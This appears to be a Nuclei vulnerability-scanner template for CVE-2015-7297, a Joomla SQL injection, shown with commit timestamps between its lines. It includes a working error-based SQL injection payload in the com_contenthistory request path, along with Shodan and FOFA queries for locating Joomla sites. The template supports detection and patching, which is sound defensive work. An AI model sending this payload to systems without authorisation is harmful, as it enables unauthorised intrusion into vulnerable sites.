2021-04-07 16:52:11 +00:00
|
|
|
id: CVE-2015-7297
|
2022-03-02 14:57:55 +00:00
|
|
|
|
2021-04-07 16:52:11 +00:00
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: Joomla! Core SQL Injection
|
2021-04-07 16:52:11 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2022-06-09 20:35:21 +00:00
|
|
|
description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.
|
2022-03-02 14:57:55 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
|
|
|
|
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html
|
|
|
|
- http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html
|
2022-03-02 14:57:55 +00:00
|
|
|
classification:
|
2022-09-06 01:33:31 +00:00
|
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
2023-04-18 02:40:53 +00:00
|
|
|
cvss-score: 7.5
|
2022-03-02 14:57:55 +00:00
|
|
|
cve-id: CVE-2015-7297
|
2022-09-06 01:33:31 +00:00
|
|
|
cwe-id: CWE-89
|
2024-06-07 10:04:29 +00:00
|
|
|
epss-score: 0.97553
|
|
|
|
epss-percentile: 0.99997
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: joomla
|
|
|
|
product: joomla\!
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- http.html:"joomla! - open source content management"
|
|
|
|
- http.component:"joomla"
|
|
|
|
- cpe:"cpe:2.3:a:joomla:joomla\!"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: body="joomla! - open source content management"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2015,cve,packetstorm,joomla,sqli
|
2022-06-30 03:32:10 +00:00
|
|
|
variables:
|
|
|
|
num: "999999999"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-04-07 16:52:11 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-06-30 03:32:10 +00:00
|
|
|
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
|
2021-04-07 16:52:11 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-04-07 16:52:11 +00:00
|
|
|
words:
|
2022-06-30 03:32:10 +00:00
|
|
|
- '{{md5({{num}})}}'
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a0047304502207a3b55b62d3630083acd3ff5ac07b40b36072cd0f19057206fc1c857c76d09100221009f3084a270873f40433bd307963f6139d6ec53c5e9dbcded90a7b58260331e85:922c64590222798bb761d5b6d8e72950
|